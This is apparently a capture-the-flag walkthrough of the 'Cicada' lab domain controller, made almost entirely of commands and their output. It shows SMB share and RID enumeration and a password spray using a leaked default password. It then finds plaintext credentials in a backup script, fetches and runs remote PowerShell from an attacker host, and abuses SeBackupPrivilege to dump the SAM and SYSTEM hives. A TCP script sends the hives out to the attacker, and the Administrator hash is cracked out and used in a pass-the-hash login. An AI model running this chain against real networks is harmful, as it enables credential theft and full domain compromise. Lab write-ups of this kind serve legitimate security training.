Last updated
└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --shares
SMB 10.129.52.9 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.9 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.52.9 445 CICADA-DC [*] Enumerated shares
SMB 10.129.52.9 445 CICADA-DC Share Permissions Remark
SMB 10.129.52.9 445 CICADA-DC ----- ----------- ------
SMB 10.129.52.9 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.52.9 445 CICADA-DC C$ Default share
SMB 10.129.52.9 445 CICADA-DC DEV
SMB 10.129.52.9 445 CICADA-DC HR READ
SMB 10.129.52.9 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.52.9 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.52.9 445 CICADA-DC SYSVOL Logon server share└─$ smbclient -U 'cicada.htb\\guest' //10.129.52.9/HR
Password for [guest]: # Blank,just enter
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 267725 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --rid-brute | tee rid-brute.log
SMB 10.129.52.9 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.9 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.52.9 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.52.9 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.52.9 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.52.9 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.52.9 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.52.9 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.52.9 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.52.9 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)└─$ grep 'User' rid-brute.log | awk '{print($6)}' > users.txt
└─$ netexec smb 10.129.52.9 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.129.52.9 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.52.9 445 CICADA-DC [+] CICADA\Protected:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.52.9 445 CICADA-DC [-] CICADA\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE└─$ py cicada-mastertul.py --setup
└─$ py cicada-mastertul.py -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -t 10.129.52.9 --full└─$ netexec smb 10.129.52.9 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.52.9 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.9 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.52.9 445 CICADA-DC [*] Enumerated shares
SMB 10.129.52.9 445 CICADA-DC Share Permissions Remark
SMB 10.129.52.9 445 CICADA-DC ----- ----------- ------
SMB 10.129.52.9 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.52.9 445 CICADA-DC C$ Default share
SMB 10.129.52.9 445 CICADA-DC DEV READ
SMB 10.129.52.9 445 CICADA-DC HR READ
SMB 10.129.52.9 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.52.9 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.52.9 445 CICADA-DC SYSVOL READ Logon server share└─$ smbclient -U 'cicada.htb\\david.orelious%aRt$Lp#7t*VQ!3' //10.129.52.9/DEV
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 267229 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"└─$ netexec smb 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB 10.129.52.9 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.52.9 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB 10.129.52.9 445 CICADA-DC [*] Enumerated shares
SMB 10.129.52.9 445 CICADA-DC Share Permissions Remark
SMB 10.129.52.9 445 CICADA-DC ----- ----------- ------
SMB 10.129.52.9 445 CICADA-DC ADMIN$ READ Remote Admin
SMB 10.129.52.9 445 CICADA-DC C$ READ,WRITE Default share
SMB 10.129.52.9 445 CICADA-DC DEV
SMB 10.129.52.9 445 CICADA-DC HR READ
SMB 10.129.52.9 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.52.9 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.52.9 445 CICADA-DC SYSVOL READ Logon server share└─$ evil-winrm -i 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> cat Desktop/user.txt
5d06034ac3b70457a11097d99e13d7f7└─$ bloodhound-python -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -c all -op emily --zip -d cicada.htb -ns 10.129.52.9
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20240928153115_bloodhound.zip*Evil-WinRM* PS C:\> ls Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/26/2024 1:10 PM Administrator
d----- 8/22/2024 2:22 PM emily.oscars.CICADA
d-r--- 3/14/2024 3:45 AM Public*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> IEX(IWR http://10.10.14.58/adPEAS.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> Invoke-adPEAS*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /all
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled└─$ curl -LOq https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/refs/heads/master/Privesc/Acl-FullControl.ps1
---
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> IEX(IWR http://10.10.14.58/Acl-FullControl.ps1 -UseBasicParsing)*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Acl-FullControl -user 'CICADA.HTB\emily.oscars.CICADA' -path 'C:\Users\Administrator\Desktop'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> get-acl * | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner : BUILTIN\Administrators
Group : CICADA\Domain Users
Access : CICADA\Administrator Allow FullControl
CICADA\emily.oscars Deny FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
CICADA\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:AI(A;;FA;;;LA)(D;ID;FA;;;S-1-5-21-917908876-1423158569-3159038727-1601)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeCmdLets.dll -out SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeUtils.dll -out SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege /Users/Administrator/Desktop/root.txt flag.txt -Overwrite└─$ listen 4444 > sam.save
└─$ listen 4445 > system.save
---
reg save hklm\sam sam.save
reg save hklm\system system.save
$server = "10.10.14.58"; $port = 4444;
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\sam.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
$port = 4445;
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\system.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
---
└─$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...└─$ evil-winrm -i 10.129.52.9 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
3ffea962422f28b012d9e50c17404518robocopy /b C:\Users\Administrator\Desktop C:\programdata root.txt